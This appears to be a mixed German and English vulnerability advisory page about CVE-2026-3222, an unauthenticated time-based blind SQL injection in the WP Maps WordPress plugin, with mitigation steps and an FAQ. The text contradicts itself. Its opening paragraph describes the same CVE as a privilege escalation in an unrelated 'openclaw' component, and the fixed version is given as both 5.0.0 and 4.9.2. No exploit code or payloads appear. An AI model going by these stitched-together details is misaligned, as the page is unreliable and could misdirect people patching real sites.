Plattform
wordpress
Komponente
wp-google-map-plugin
Behoben in
5.0.0
CVE-2026-3222 is a privilege escalation vulnerability found in the openclaw component. This flaw allows an attacker to silently widen the scope of a paired device from 'operator.read' to 'operator.admin', potentially enabling Remote Code Execution (RCE) on the node. The vulnerability affects versions of openclaw up to and including 2026.3.24, and a patch is available in version 2026.3.25.
Successful exploitation of CVE-2026-3222 could allow an attacker to extract sensitive data stored within the WordPress database. The time-based blind SQL injection technique means the attacker must infer the data bit by bit, making the process slower but still effective. Given that WordPress sites often store user credentials, customer data, and other confidential information, the potential impact is significant. An attacker could potentially gain complete control of the WordPress site, modify content, or even delete data. The wpgmpajaxcall handler, accessible to unauthenticated users, further exacerbates the risk by allowing arbitrary class method calls with the unsanitized location_id parameter.
CVE-2026-3222 was publicly disclosed on March 11, 2026. While no active exploitation campaigns have been publicly confirmed, the vulnerability's ease of exploitation and the prevalence of WordPress sites make it a potential target. The vulnerability is not currently listed on the CISA KEV catalog. Public proof-of-concept exploits are likely to emerge, increasing the risk of widespread exploitation.
Exploit-Status
EPSS
0.21% (43% Perzentil)
CISA SSVC
CVSS-Vektor
The primary mitigation for CVE-2026-3222 is to immediately upgrade the WP Maps plugin to version 4.9.2 or later. If upgrading is not immediately feasible due to compatibility issues or testing requirements, consider implementing a temporary workaround by sanitizing the locationid parameter on the server-side before it is used in any database queries. Web Application Firewalls (WAFs) configured to detect and block SQL injection attempts can also provide an additional layer of protection. Specifically, look for rules that detect backtick usage within user-supplied input. After upgrading, verify the fix by attempting a SQL injection payload via the 'locationid' parameter and confirming that it is properly sanitized.
Aktualisieren Sie auf Version 4.9.2 oder eine neuere gepatchte Version
Schwachstellenanalysen und kritische Warnungen direkt in deinen Posteingang.
It's a type of attack where the attacker infers information from the database by observing the server's response times. There's no direct visible response, but the attacker deduces information based on how long the server takes to respond to different queries.
It allows an attacker to access sensitive database information, modify data, or even gain control of the website, which can have severe security and privacy consequences.
As a temporary measure, restrict access to the wpgmpajaxcall AJAX endpoint to authenticated users and monitor server logs for suspicious activity.
If you are using a version of WP Maps prior to 4.9.2, your website is vulnerable. You can use vulnerability scanning tools to confirm.
You can find more information about CVE-2026-3222 in vulnerability databases such as the National Vulnerability Database (NVD) and on the WP Maps support forums.
Lade deine Abhängigkeitsdatei hoch und erfahre sofort, ob dich diese und andere CVEs treffen.
Lade deine Abhängigkeitsdatei hoch und erfahre sofort, ob dich diese und andere CVEs treffen.